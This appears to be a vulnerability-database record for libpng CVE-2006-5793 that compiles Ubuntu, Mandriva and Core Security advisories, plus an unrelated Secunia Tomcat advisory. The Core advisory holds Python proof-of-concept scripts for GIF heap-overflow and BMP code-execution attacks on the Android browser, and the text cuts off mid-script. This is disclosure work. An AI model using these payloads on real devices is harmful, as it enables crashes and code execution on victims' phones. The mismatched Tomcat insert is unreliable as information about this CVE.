VARIoT IoT vulnerabilities database
| VAR-200611-0210 | CVE-2006-5793 | libpng of png_set_sPLT() Denial of service in function (DoS) Vulnerability |
CVSS V2: 2.6 CVSS V3: - Severity: LOW |
The sPLT chunk handling code (png_set_sPLT function in pngset.c) in libpng 1.0.6 through 1.2.12 uses a sizeof operator on the wrong data type, which allows context-dependent attackers to cause a denial of service (crash) via malformed sPLT chunks that trigger an out-of-bounds read. PNG (Portable Network Graphics) Format image processing library libpng In png_set_sPLT() In the function sPLT In the chunk processing code section, PNG There is a problem that memory access violation occurs due to image processing.Web Pre-crafted, installed on site or attached to email png By browsing the file, service operation interruption (DoS) May be in a state. The 'libpng' graphics library is reported prone to a denial-of-service vulnerability. The library fails to perform proper bounds-checking of user-supplied input, which leads to an out-of-bounds read error.
Attackers may exploit this vulnerability to crash an application that relies on the affected library. ===========================================================
Ubuntu Security Notice USN-383-1 November 16, 2006
libpng vulnerability
CVE-2006-5793
===========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 5.10
Ubuntu 6.06 LTS
Ubuntu 6.10
This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.
The problem can be corrected by upgrading your system to the
following package versions:
Ubuntu 5.10:
libpng10-0 1.0.18-1ubuntu3.1
Ubuntu 6.06 LTS:
libpng12-0 1.2.8rel-5ubuntu0.1
Ubuntu 6.10:
libpng12-0 1.2.8rel-5.1ubuntu0.1
After a standard system upgrade you need to reboot your computer to
effect the necessary changes.
Details follow:
Tavis Ormandy discovered that libpng did not correctly calculate the
size of sPLT structures when reading an image.
Updated packages for Ubuntu 5.10:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.0.18-1ubuntu3.1.diff.gz
Size/MD5: 12960 3ae9ff536ba163efc00070487687399b
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.0.18-1ubuntu3.1.dsc
Size/MD5: 636 3af55a46b4ada05160527a49c5dd6671
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.0.18.orig.tar.gz
Size/MD5: 506181 40081bdc82e4c6cf782553cd5aa8d9d8
Architecture independent packages:
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng2-dev_1.0.18-1ubuntu3.1_all.deb
Size/MD5: 1166 160ce752a119a735d2abf03ec1f1dd55
http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng2_1.0.18-1ubuntu3.1_all.deb
Size/MD5: 942 e3c40272cd978953acf3469dbda42a30
amd64 architecture (Athlon64, Opteron, EM64T Xeon)
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng10-0_1.0.18-1ubuntu3.1_amd64.deb
Size/MD5: 113890 e395ef9909e34cc4333fb868a7a794f2
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng10-dev_1.0.18-1ubuntu3.1_amd64.deb
Size/MD5: 197710 1b46e5c7e431d6640e319ca81f0634ad
i386 architecture (x86 compatible Intel/AMD)
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng10-0_1.0.18-1ubuntu3.1_i386.deb
Size/MD5: 109224 e083cb785e2bc0225b47fee51c69b22b
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng10-dev_1.0.18-1ubuntu3.1_i386.deb
Size/MD5: 186536 476d8276b05d075552fc878547a17092
powerpc architecture (Apple Macintosh G3/G4/G5)
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng10-0_1.0.18-1ubuntu3.1_powerpc.deb
Size/MD5: 111444 cda22be3ef3d978e4aa3c7111c7f7436
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng10-dev_1.0.18-1ubuntu3.1_powerpc.deb
Size/MD5: 196744 db0ae3294f47addab0ff52b4d134fff8
sparc architecture (Sun SPARC/UltraSPARC)
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng10-0_1.0.18-1ubuntu3.1_sparc.deb
Size/MD5: 109078 26672912dc8d37ae7afbc57fba8cc477
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng10-dev_1.0.18-1ubuntu3.1_sparc.deb
Size/MD5: 192902 458ef029777b12b5b4165e63d097c774
Updated packages for Ubuntu 6.06 LTS:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel-5ubuntu0.1.diff.gz
Size/MD5: 16308 c13ba4eb92c046153c73cec343ba0dad
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel-5ubuntu0.1.dsc
Size/MD5: 652 ec80abc5bbe3fb9593374a6df3e5351d
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel.orig.tar.gz
Size/MD5: 510681 cac1512878fb98f2456df6dc50bc9bc7
Architecture independent packages:
http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng3_1.2.8rel-5ubuntu0.1_all.deb
Size/MD5: 842 db0b015e80f042a3311152aad1a1f96f
amd64 architecture (Athlon64, Opteron, EM64T Xeon)
http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.1_amd64.udeb
Size/MD5: 69468 8c741fd0d0ff83068e6dd78bc2e026c1
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.1_amd64.deb
Size/MD5: 113808 c86b5b27effab5f974f4f2c4ce743515
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.1_amd64.deb
Size/MD5: 247500 6493fda0d94d75f2255cb48399fa5fec
i386 architecture (x86 compatible Intel/AMD)
http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.1_i386.udeb
Size/MD5: 66918 38259ac6fd9f0b4fc56e59b9b8fa75e4
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.1_i386.deb
Size/MD5: 111304 440e23028cc1c9de3fb459f8969641d5
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.1_i386.deb
Size/MD5: 239650 0235a7988ea235573758fd45a7500cf9
powerpc architecture (Apple Macintosh G3/G4/G5)
http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.1_powerpc.udeb
Size/MD5: 66284 ba2f362738e47667364a69a7425a4bae
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.1_powerpc.deb
Size/MD5: 110738 27426cfb75acb15305d71a26d79ecf70
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.1_powerpc.deb
Size/MD5: 245228 297d5a07d22ea0c2deb1e3a2da22cc7d
sparc architecture (Sun SPARC/UltraSPARC)
http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.1_sparc.udeb
Size/MD5: 63820 b28e9240844c87f288986efcfaa6d82b
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.1_sparc.deb
Size/MD5: 108438 439feb51a430e75b0314ebd0bbe9eeaf
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.1_sparc.deb
Size/MD5: 240068 f1d19c0623d6a875c240ae809f39cc37
Updated packages for Ubuntu 6.10:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel-5.1ubuntu0.1.diff.gz
Size/MD5: 16419 341fce97b60457776d7d5b3045e98ab8
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel-5.1ubuntu0.1.dsc
Size/MD5: 659 128223fd1ee1485c1edda30965e2c638
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel.orig.tar.gz
Size/MD5: 510681 cac1512878fb98f2456df6dc50bc9bc7
Architecture independent packages:
http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng3_1.2.8rel-5.1ubuntu0.1_all.deb
Size/MD5: 884 ff80da62782949d9ee6e2f45de7368d8
amd64 architecture (Athlon64, Opteron, EM64T Xeon)
http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5.1ubuntu0.1_amd64.udeb
Size/MD5: 68974 410bb02f1680b74c0b7bdfe75b6d4f6c
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5.1ubuntu0.1_amd64.deb
Size/MD5: 113470 595b09232667d5f45bfc94cbac2154e4
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5.1ubuntu0.1_amd64.deb
Size/MD5: 247126 af29f417517106cf651dab5c92ad52ee
i386 architecture (x86 compatible Intel/AMD)
http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5.1ubuntu0.1_i386.udeb
Size/MD5: 69914 d335eae45c97a06251e2b1bb263a0f78
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5.1ubuntu0.1_i386.deb
Size/MD5: 114466 eb4ebc44ac004eddd4ac551f443d9196
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5.1ubuntu0.1_i386.deb
Size/MD5: 242864 a79b348098a3e5051a93dcc3bfc44f80
powerpc architecture (Apple Macintosh G3/G4/G5)
http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5.1ubuntu0.1_powerpc.udeb
Size/MD5: 67592 c11829d98adc0dd16883d1b00c773691
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5.1ubuntu0.1_powerpc.deb
Size/MD5: 112146 e95acde5a5756fe1e8ae3085e160a437
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5.1ubuntu0.1_powerpc.deb
Size/MD5: 246662 eea28613a44952b49f1ebd1c9365c31e
sparc architecture (Sun SPARC/UltraSPARC)
http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5.1ubuntu0.1_sparc.udeb
Size/MD5: 64644 0a019f09ea70eb9e0734542116919875
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5.1ubuntu0.1_sparc.deb
Size/MD5: 109320 c8c61d5fc9db2c8edf9ca933bc0aeea6
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5.1ubuntu0.1_sparc.deb
Size/MD5: 241060 a4d7a38de962236150bbbb84be9c542f
. ----------------------------------------------------------------------
Do you need accurate and reliable IDS / IPS / AV detection rules?
Get in-depth vulnerability details:
http://secunia.com/binary_analysis/sample_analysis/
----------------------------------------------------------------------
TITLE:
Apache Tomcat "RemoteFilterValve" Security Bypass Security Issue
SECUNIA ADVISORY ID:
SA32213
VERIFY ADVISORY:
http://secunia.com/advisories/32213/
CRITICAL:
Not critical
IMPACT:
Security Bypass
WHERE:
>From remote
SOFTWARE:
Apache Tomcat 5.x
http://secunia.com/advisories/product/3571/
Apache Tomcat 4.x
http://secunia.com/advisories/product/328/
DESCRIPTION:
A security issue has been reported in Apache Tomcat, which
potentially can be exploited by malicious people to bypass certain
security restrictions.
The security issue is caused due to a synchronisation problem when
checking IP addresses and can be exploited to bypass a filter valve
that extends "RemoteFilterValve" and potentially gain access to
protected contexts.
SOLUTION:
Apache Tomcat 4.x:
Update to version 4.1.32 or later.
Apache Tomcat 5.x:
Update to version 5.5.1 or later.
PROVIDED AND/OR DISCOVERED BY:
The vendor credits Kenichi Tsukamoto of Fujitsu Limited.
ORIGINAL ADVISORY:
Apache:
http://tomcat.apache.org/security-4.html
http://tomcat.apache.org/security-5.html
https://issues.apache.org/bugzilla/show_bug.cgi?id=25835
JVN:
http://jvn.jp/en/jp/JVN30732239/index.html
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
_______________________________________________________________________
Mandriva Linux Security Advisory MDKSA-2006:212
http://www.mandriva.com/security/
_______________________________________________________________________
Package : doxygen
Date : November 16, 2006
Affected: 2006.0, 2007.0, Corporate 3.0, Corporate 4.0
_______________________________________________________________________
Problem Description:
Doxygen is a documentation system for C, C++ and IDL.
Tavis Ormandy, of the Gentoo Linux Security Auditing Team, discovered a
typo in png_set_sPLT() that may cause an application using libpng to
read out of bounds, resulting in a crash. (CVE-2006-5793)
In addition, an patch to address several old vulnerabilities has been
applied to this build. (CAN-2002-1363, CAN-2004-0421, CAN-2004-0597,
CAN-2004-0598, CAN-2004-0599)
Packages have been patched to correct these issues.
_______________________________________________________________________
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1363
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0421
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0597
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0598
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0599
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3334
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5793
_______________________________________________________________________
Updated Packages:
Mandriva Linux 2006.0:
f85fd4b73ca06136e4346df073851e5f 2006.0/i586/doxygen-1.4.4-1.1.20060mdk.i586.rpm
0842c1496bbb02b79d5cef3386b19380 2006.0/SRPMS/doxygen-1.4.4-1.1.20060mdk.src.rpm
Mandriva Linux 2006.0/X86_64:
fc3e569bd8ad2aa9aea76a6f4246cfec 2006.0/x86_64/doxygen-1.4.4-1.1.20060mdk.x86_64.rpm
0842c1496bbb02b79d5cef3386b19380 2006.0/SRPMS/doxygen-1.4.4-1.1.20060mdk.src.rpm
Mandriva Linux 2007.0:
9d0af28627560057e6c80e64bbacf030 2007.0/i586/doxygen-1.4.7-1.1mdv2007.0.i586.rpm
f673aab0185f79a8aa048f69b06807bf 2007.0/SRPMS/doxygen-1.4.7-1.1mdv2007.0.src.rpm
Mandriva Linux 2007.0/X86_64:
7fca6ebbe6f07e51de7fd771678277b4 2007.0/x86_64/doxygen-1.4.7-1.1mdv2007.0.x86_64.rpm
f673aab0185f79a8aa048f69b06807bf 2007.0/SRPMS/doxygen-1.4.7-1.1mdv2007.0.src.rpm
Corporate 3.0:
9452cede2d92671808eebe1adfc395ef corporate/3.0/i586/doxygen-1.3.5-2.1.C30mdk.i586.rpm
9e84b6e12b77f43d123888b7ae05e5f4 corporate/3.0/SRPMS/doxygen-1.3.5-2.1.C30mdk.src.rpm
Corporate 3.0/X86_64:
d988dc94c39515b3855116709bcc84de corporate/3.0/x86_64/doxygen-1.3.5-2.1.C30mdk.x86_64.rpm
9e84b6e12b77f43d123888b7ae05e5f4 corporate/3.0/SRPMS/doxygen-1.3.5-2.1.C30mdk.src.rpm
Corporate 4.0:
a3b4702c81d1739249d59782efb316dc corporate/4.0/i586/doxygen-1.4.4-1.1.20060mlcs4.i586.rpm
8223a356c6cf8a790dd20b3d70533f19 corporate/4.0/SRPMS/doxygen-1.4.4-1.1.20060mlcs4.src.rpm
Corporate 4.0/X86_64:
0568b10460c651f18fd3e2a8e76b4300 corporate/4.0/x86_64/doxygen-1.4.4-1.1.20060mlcs4.x86_64.rpm
8223a356c6cf8a790dd20b3d70533f19 corporate/4.0/SRPMS/doxygen-1.4.4-1.1.20060mlcs4.src.rpm
_______________________________________________________________________
To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you. You can obtain the
GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/security/advisories
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
_______________________________________________________________________
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
<security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.2 (GNU/Linux)
iD8DBQFFXMIpmqjQ0CJFipgRAnt1AJ9NuzEsIC9PzHE278eZAhOPHjMh8QCePD/Q
pK8OJ2vhx3DqZ400EPH5QMw=
=R8Jo
-----END PGP SIGNATURE-----
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs
Multiple vulnerabilities in Google's Android SDK
*Advisory Information*
Title: Multiple vulnerabilities in Google's Android SDK
Advisory ID: CORE-2008-0124
Advisory URL: http://www.coresecurity.com/?action=item&id=2148
Date published: 2008-03-04
Date of last update: 2008-03-04
Vendors contacted: Google
Release mode: Coordinated release
*Vulnerability Information*
Class: Heap overflow, integer overflow
Remotely Exploitable: No
Locally Exploitable: No
Bugtraq ID: 28006, 28005
CVE Name: CVE-2008-0986, CVE-2008-0985, CVE-2006-5793, CVE-2007-2445,
CVE-2007-5267, CVE-2007-5266, CVE-2007-5268, CVE-2007-5269
*Vulnerability Description*
Android is project promoted primarily by Google through the Open Handset
Alliance aimed at providing a complete set of software for mobile
devices: an operating system, middleware and key mobile applications
[1]. Although the project is currently in a development phase and has
not made an official release yet, several vendors of mobile chips have
unveiled prototype phones built using development releases of the
platform at the Mobile World Congress [2]. Development using the Android
platform gained activity early in 2008 as a result of Google's launch of
the Android Development Challenge which includes $10 million USD in
awards [3] for which a Software Development Kit (SDK) was made available
in November 2007.
The Android Software Development Kit includes a fully functional
operating system, a set of core libraries, application development
frameworks, a virtual machine for executing application and a phone
emulator based on the QEMU emulator [4]. Public reports as of February
27th, 2008 state that the Android SDK has been downloaded 750,000 times
since November 2007 [5].
Several vulnerabilities have been found in Android's core libraries for
processing graphic content in some of the most used image formats (PNG,
GIF an BMP). While some of these vulnerabilities stem from the use of
outdated and vulnerable open source image processing libraries other
were introduced by native Android code that use them or that implements
new functionality.
Exploitation of these vulnerabilities to yield complete control of a
phone running the Android platform has been proved possible using the
emulator included in the SDK, which emulates phone running the Android
platform on an ARM microprocessor.
This advisory contains technical descriptions of these security bugs,
including a proof of concept exploit to run arbitrary code, proving the
possibility of running code on Android stack (over an ARM architecture)
via a binary exploit.
*Vulnerable Packages*
. Android SDK m3-rc37a and earlier are vulnerable several bugs in
components that process GIF, PNG and BMP images (bugs #1, #2 and #3 of
this advisory). Android SDK m5-rc14 is vulnerable to a security bug in the component
that process BMP images (bug #3).
*Non-vulnerable Packages*
. Android SDK m5-rc15
*Vendor Information, Solutions and Workarounds*
Vendor statement:
"The current version of the Android SDK is an early look release to the
open source community, provided so that developers can begin working
with the platform to inform and shape our development of Android toward
production readiness. The Open Handset Alliance welcomes input from the
security community throughout this process. There will be many changes
and updates to the platform before Android is ready for end users,
including a full security review."
*Credits*
These vulnerabilities were discovered by Alfredo Ortega from Core
Security Technologies, leading his Bugweek 2007 team called "Pampa
Grande". It was researched in depth by Alfredo Ortega.
*Technical Description / Proof of Concept Code*
Android is a software stack for mobile devices that includes an
operating system, middleware and key applications. Android relies on
Linux version 2.6 for core system services such as security, memory
management, process management, network stack, and driver model. The
kernel also acts as an abstraction layer between the hardware and the
rest of the software stack.
The WebKit application framework is included to facilitate development
of web client application functionality. The framework in turn uses
different third-party open source libraries to implement processing of
several image formats.
Android includes a web browser based on the Webkit framework that
contains multiple binary vulnerabilities when processing .GIF, .PNG and
.BMP image files, allowing malicious client-side attacks on the web
browser. A client-side attack could be launched from a malicious web
site, hosting specially crafted content, with the possibility of
executing arbitrary code on the victim's Android system.
These client-side binary vulnerabilities were discovered using the
Android SDK that includes an ARM architecture emulator. Binary
vulnerabilities are the most common security bugs in computer software.
Basic bibliography on these vulnerabilities includes a recently updated
handbook about security holes that also describes current
state-of-the-start exploitation techniques for different hardware
platforms and operating systems [6].
The vulnerabilities discovered are summarized below grouped by the type
of image file format that is parsed by the vulnerable component.
#1 - GIF image parsing heap overflow
The Graphics Interchange Format (GIF) is image format dating at least
from 1989 [7]. It was popularized because GIF images can be compressed
using the Lempel-Ziv-Welch (LZW) compression technique thus reducing the
memory footprint and bandwidth required for transmission and storage.
A memory corruption condition happens within the GIF processing library
of the WebKit framework when the function 'GIFImageDecoder::onDecode()'
allocates a heap buffer based on the _Logical Screen Width and Height_
filed of the GIF header (offsets 6 and 8) and then the resulting buffer
is filled in with an amount of data bytes that is calculated based on
the real Width and Height of the GIF image. There is a similar (if not
the same) bug in the function 'GIFImageDecoder::haveDecodedRow() 'in the
open-source version included by Android in
'WebKitLib\WebKit\WebCore\platform\image-decoders\gif\GifImageDecoder.cpp'
inside 'webkit-522-android-m3-rc20.tar.gz' available at [8].
Detailed analysis:
When the process 'com.google.android.browser' must handle content with
a GIF file it loads a dynamic library called 'libsgl.so' which contains
the decoders for multiple image file formats.
Decoding of the GIF image is performed correctly by the library giflib
4.0 (compiled inside 'libsgl.so'). However, the wrapper object
'GIFImageDecoder' miscalculates the total size of the image.
First, the Logical Screen Size is read and stored in the following
calling sequence (As giflib is an Open Source MIT-licenced library, the
source was available for analysis):
'GIFImageDecoder::onDecode()->DGifOpen()->DGifGetScreenDesc()'. The last
function, 'DGifGetScreenDesc()', stores the _Logical Screen Width and
Height_ in a structure called 'GifFileType':
/-----------
Int DGifGetScreenDesc(GifFileType * GifFile) {
...
/* Put the screen descriptor into the file: */
if (DGifGetWord(GifFile, &GifFile->SWidth) == GIF_ERROR ||
DGifGetWord(GifFile, &GifFile->SHeight) == GIF_ERROR)
return GIF_ERROR;
...
}
- -----------/
We can see that the fields are stored in the first 2 words of the
structure:
/-----------
typedef struct GifFileType {
/* Screen dimensions. */
GifWord SWidth, SHeight,
...
}
- -----------/
In the disassembly of the GIFImageDecoder::onDecode() function provided
below we can see how the DGifOpen() function is called and that the
return value (A GifFileType struct) is stored on the $R5 ARM register:
/-----------
.text:0002F234 BL _DGifOpen
.text:0002F238 SUBS R5, R0, #0 ; GifFile -_ $R5
- -----------/
Then, the giflib function 'DGifSlurp()' is called and the Image size is
correctly allocated using the Image Width and Height and not the Logical
Screen Size:
/-----------
Int DGifSlurp(GifFileType * GifFile)
{ ... ImageSize = sp->ImageDesc.Width * sp->ImageDesc.Height;
sp->RasterBits = (unsigned char *)malloc(ImageSize *
sizeof(GifPixelType));
...
}
- -----------/
Afterwards the _Logical Screen_ Width and Height are stored in the R9
and R11 registers:
/-----------
.text:0002F28C LDMIA R5, {R9,R11} ; R9=SWidth R11=SHeight !
- -----------/
However the actual image may be much larger that these sizes that are
incorrectly passed to a number of methods of the 'GIFImageDecoder':
/-----------
ImageDecoder::chooseFromOneChoice():
.text:0002F294 MOV R0, R8
.text:0002F298 MOV R1, #3
.text:0002F29C MOV R2, R9
.text:0002F2A0 MOV R3, R11
.text:0002F2A4 STR R12, [SP,#0x48+var_3C]
.text:0002F2A8 BL _ImageDecoder19chooseFromOneChoice;
ImageDecoder::chooseFromOneChoice(SkBitmap::Config,int
,int)
Bitmap::setConfig():
.text:0002F2B8 MOV R0, R7 ; R7 = SkBitmap
.text:0002F2BC MOV R1, #3
.text:0002F2C0 MOV R2, R9 ; R9=SWidth R11=SHeight !
.text:0002F2C4 MOV R3, R11
.text:0002F2C8 STR R10, [SP,#0x48+var_48]
.text:0002F2CC BL _Bitmap9setConfig ;
Bitmap::setConfig(SkBitmap::Config,uint,uint,uint)
- -----------/
This function stores the SWidth and SHeight inside the Bitmap object as
shown in the following code snippet:
/-----------
.text:00035C38 MOV R7, R2 ; $R2 = SWidth, goes to $R7
.text:00035C3C MOV R8, R3 ; $R3 = SHeight, goes to $R8
.text:00035C40 MOV R4, R0 ; $R4 = *Bitmap
- -----------/
And later:
/-----------
.text:00035C58 BL _Bitmap15ComputeRowBytes ;
SkBitmap::ComputeRowBytes(SkBitmap::Config,uint)
.text:00035C5C MOV R5, R0 ; $R5 = Real Row Bytes
.text:00035C68 STRH R7, [R4,#0x18] ; *Bitmap+0x18 = SWidth
.text:00035C6C STRH R8, [R4,#0x1A] ; *Bitmap+0x1A = SHeight
.text:00035C60 STRH R5, [R4,#0x1C] ; *Bitmap+0x1C = Row Bytes
- -----------/
The following python script generates a GIF file that causes the
overflow. It requires the Python Imaging Library. Once generated the GIF
file, it must be opened in the Android browser to trigger the overflow:
/-----------
##Android Heap Overflow
##Ortega Alfredo _ Core Security Exploit Writers Team
##tested against Android SDK m3-rc37a
import Image
import struct
#Creates a _good_ gif image
imagename='overflow.gif'
str = '\x00\x00\x00\x00'*30000
im = Image.frombuffer('L',(len(str),1),str,'raw','L',0,1)
im.save(imagename,'GIF')
#Shrink the Logical screen dimension
SWidth=1
SHeight=1
img = open(imagename,'rb').read()
img = img[:6]+struct.pack('<HH',SWidth,SHeight)+img[10:]
#Save the _bad_ gif image
q=open(imagename,'wb=""')
q.write(img)
q.close()
- -----------/
This security bug affects Android SDK m3-rc37a and earlier versions.
Version m5-rc14 of the Android SDK includes a fix and is not vulnerable
to this bug.
#2 - PNG image parsing, multiple vulnerabilities:
The Portable Network Graphics (PNG) is a bitmapped image format that
employs lossless data compression [9]. PNG was created to improve upon
and replace the GIF format as an image file format that does not require
a patent license.
The library 'libsgl.so' used by Android's WebKit contains commonly used
code to load graphic files, as libpng, giflib and others. The version
inside libsgl.so distributed with Android SDK m3-rc37a and earlier
versions include the string '"libpng version 1.2.8 - December 3, 2004"'.
Source code inspection of the file
'\WebKitLib\WebKit\WebCore\platform\image-decoders\png\png.c' included
in the 'webkit-522-android-m3-rc20.tar.gz ' release of the Android
project reveals that '"libpng version 1.2.7 - September
12, 2004"' has been used in this release.
This old version of libpng makes Android SDK m3-rc37a and earlier
versions vulnerable to the following known issues: ' CVE-2006-5793,
CVE-2007-2445, CVE-2007-5267, CVE-2007-5266, CVE-2007-5268,
CVE-2007-5269 '.
Android version m5-rc14 has been updated to include libpng 1.2.24 and is
likely not vulnerable.
#3 - BMP image processing, negative offset integer overflow:
The BMP file format, sometimes called bitmap or DIB file format (for
device-independent bitmap), is an image file format used to store bitmap
digital images, especially on Microsoft Windows and OS/2 operating
systems [10].
The integer overflow is caused when a Windows Bitmap file (.BMP) header
is parsed in the method 'BMP::readFromStream(Stream *,
ImageDecoder::Mode)' inside the 'libsgl.so' library. When the
value of the 'offset' field of the BMP file header is negative and the
Bitmap Information section (DIB header) specifies an image of 8 bits per
pixel (8 bpp) the parser will try to allocate a palette, and will use
the negative offset to calculate the size of the palette.
The following code initializes the palette with the color white
('0x00ffffff') but with a carefully chosen negative offset it can be
made to overwrite any address of the process with that value. Because
the BMP decoder source wasn't released, a disassembly of the binary
included by Android is provided below:
/-----------
.text:0002EE38 MOV LR, R7 ; R7 is the negative offset
.text:0002EE3C MOV R12, R7,LSL#2
.text:0002EE40
.text:0002EE40 loc_2EE40
.text:0002EE40 LDR R3, [R10,#0x10]
.text:0002EE44 ADD LR, LR, #1
.text:0002EE48 MOVL R2, 0xFFFFFFFF
.text:0002EE4C ADD R1, R12, R3 ; R3 is uninitialized (because of the
same bug) but ranges 0x10000-0x20000
.text:0002EE50 MOV R0, #0
.text:0002EE54 CMP LR, R9
.text:0002EE58 STRB R2, [R12,R3] ;Write 0x00ffffff to R12+13 (equals R1)
.text:0002EE5C STRB R2, [R1,#2]
.text:0002EE60 STRB R0, [R1,#3]
.text:0002EE64 STRB R2, [R1,#1]
.text:0002EE68 ADD R12, R12, #4
.text:0002EE6C BNE loc_2EE40
- -----------/
Now, if let's take a look at the memory map of the Android browser:
/-----------
# ps
ps
USER PID PPID VSIZE RSS WCHAN PC NAME
root 1 0 248 64 c0084edc 0000ae2c S /init
root 2 0 0 0 c0049168 00000000 S kthreadd
...
root 1206 1165 16892 14564 c0084edc 00274af8 S ./gdb
app_0 1574 535 83564 12832 ffffffff afe0c79c S
com.google.android.browser
root 1600 587 840 324 00000000 afe0bfbc R ps
# cat /proc/1574/maps
cat /proc/1574/maps
00008000-0000a000 rwxp 00000000 1f:00 514 /system/bin/app_process
0000a000-00c73000 rwxp 0000a000 00:00 0 [heap]
08000000-08001000 rw-s 00000000 00:08 344 /dev/zero (deleted)
...
#
- -----------/
We can see that the heap is located in the range '0000a000-00c73000'
and it is executable. Overwriting this area will allow to redirect
execution flow if there is a virtual table stored in the heap. Later on
the same method we can see that a call to the "Stream" Object VT is made:
/-----------
.text:0002EB64 LDR R12, [R8] # R8 is the "this" pointer of the Stream Object
.text:0002EB68 MOV R0, R8
.text:0002EB6C MOV LR, PC
.text:0002EB70 LDR PC, [R12,#0x10] # A call is made to Stream+0x10
- -----------/
Because the "Stream" Object (R8) is stored on the heap and we can fill
the heap with the white color '
0x00ffffff' we can load the Program Counter with the value at
'0xffffff+0x10'. The following python script will generate a BMP to
accomplish that:
/-----------
# This script generates a Bitmap file that makes the Android browser
jump to the address at 0xffffff+0x10
# Must be loaded inside a HTML file with a tag like this: <IMG
src=badbmp.bmp>
# Alfredo Ortega - Core Security
import struct
offset = 0xffef0000
width = 0x0bffff
height=8
